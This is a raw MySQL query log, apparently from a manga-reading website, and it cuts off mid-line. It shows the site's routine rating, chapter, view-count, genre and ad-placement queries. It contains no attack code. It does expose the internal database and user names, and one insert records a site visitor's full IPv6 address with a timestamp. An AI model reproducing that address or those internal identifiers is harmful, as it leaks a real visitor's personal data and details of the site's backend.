330641435 Quit 330641436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330641436 Quit 330641437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330641437 Quit 330641438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330641438 Quit 330641439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330641439 Quit 330641440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330641441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330641441 Quit 330641442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330641440 Quit 330641442 Quit 330641443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330641443 Quit 330641444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330641444 Quit 330641445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330641445 Quit 330641446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330641446 Quit 330641447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330641447 Quit 330641448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330641448 Quit 330641449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330641449 Quit 330641450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330641450 Quit 330641451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330641451 Quit 330641452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330641452 Quit 330641453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330641453 Quit 330641454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330641454 Quit 330641455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330641455 Quit 330641456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330641456 Quit 330641457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330641457 Quit 330641458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330641458 Quit 330641459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330641459 Quit 330641460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330641460 Quit 330641461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330641461 Quit 330641462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330641462 Quit 330641463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330641463 Quit 330641464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330641464 Quit 330641465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330641465 Quit 330641466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330641466 Quit 330641467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330641467 Quit 330641468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330641468 Quit 330641469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330641469 Quit 330641470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330641470 Quit 330641471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330641471 Quit 330641472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330641472 Quit 330641473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330641473 Quit 330641474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330641474 Quit 330641475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330641475 Quit 330641476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330641476 Quit 330641477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330641477 Quit 330641478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330641478 Quit 330641479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330641479 Quit 330641480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330641480 Quit 330641481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330641481 Quit 330641482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330641482 Quit 330641483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330641483 Quit 330641484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330641484 Quit 330641485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330641485 Quit 330641486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330641486 Quit 330641487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330641487 Quit 330641488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330641488 Quit 330641489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330641489 Quit 330641490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330641490 Quit 330641491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330641491 Quit 330641492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330641492 Quit 330641493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330641493 Quit 330641494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330641494 Quit 330641495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330641495 Quit 330641496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330641496 Quit 330641497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330641497 Quit 330641498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330641498 Quit 330641499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330641499 Quit 330641500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330641500 Quit 330641501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330641501 Quit 330641502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330641502 Quit 330641503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330641503 Quit 330641504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330641504 Quit 330641505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330641505 Quit 330641506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330641506 Quit 330641507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330641507 Quit 330641508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330641508 Quit 330641509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330641509 Quit 330641510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330641510 Quit 330641511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330641511 Quit 330641512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330641512 Quit 330641513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330641513 Quit 330641514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330641514 Quit 330641515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330641515 Quit 330641516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330641516 Quit 330641517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330641517 Quit 330641518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330641518 Quit 330641519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330641519 Quit 330641520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330641520 Quit 330641521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330641521 Quit 330641522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330641522 Quit 330641523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330641523 Quit 330641524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330641524 Quit 330641525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330641525 Quit 330641526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330641526 Quit 330641527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330641527 Quit 330641528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330641528 Quit 330641529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330641529 Quit 330641530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330641530 Quit 330641531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330641531 Quit 330641532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330641532 Quit 330641533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330641533 Quit 330641534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330641534 Quit 330641535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330641535 Quit 330641536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330641536 Quit 330641537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330641537 Quit 330641538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330641538 Quit 330641539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330641539 Quit 330641540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330641540 Quit 330641541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330641541 Quit 330641542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330641542 Quit 330641543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330641543 Quit 330641544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330641544 Quit 330641545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330641545 Quit 330641546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330641546 Quit 330641547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330641547 Quit 330641548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330641548 Quit 330641549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330641549 Quit 330641550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330641550 Quit 330641551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330641551 Quit 330641552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330641552 Quit 330641553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330641553 Quit 330641554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330641554 Quit 330641555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330641555 Quit 330641556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330641556 Quit 330641557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330641557 Quit 330641558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330641558 Quit 330641559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330641559 Quit 330641560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330641560 Quit 330641561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330641561 Quit 330641562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330641562 Quit 330641563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330641563 Quit 330641564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330641564 Quit 330641565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641565 Quit 330641566 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641566 Quit 260225 19:28:07 330641567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641567 Quit 330641568 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3497' 330641568 Quit 330641569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641569 Query select * FROM chapters where id = '3497' 330641569 Quit 330641570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641570 Query select * FROM chapters where manga_id = '80' order by id desc 330641570 Quit 330641571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641571 Query Update chapters set view=view+1 where id = '3497' 330641571 Quit 330641572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641572 Query select * FROM chapters where id = '3497' 330641572 Quit 330641573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641573 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3497' 330641573 Quit 330641574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641574 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('80', '3497', '2a02:ce0:1802:de88:5ce9:c628:3c7c:b3dd', 'mangacherri.com', '2026-02-26 03:28:07', '2026-02-26 03:28:07') 330641574 Quit 330641575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641575 Query select * FROM chapter_images where chapter_id = '3497' 330641575 Quit 330641576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641576 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '80' and m.active = 1 330641576 Quit 330641577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641577 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='80' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330641577 Quit 330641578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641578 Quit 330641579 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330641579 Quit 330641580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641580 Quit 330641581 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641581 Quit 330641582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641582 Quit 330641583 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641583 Quit 330641584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641584 Quit 330641585 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641585 Quit 330641586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641586 Quit 330641587 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12459' 330641587 Quit 330641588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641588 Query select * FROM chapters where id = '12459' 330641588 Quit 330641589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641589 Query select * FROM chapters where manga_id = '239' order by id desc 330641589 Quit 330641590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641590 Query Update chapters set view=view+1 where id = '12459' 330641590 Quit 330641591 Connect mangauser@localhost on 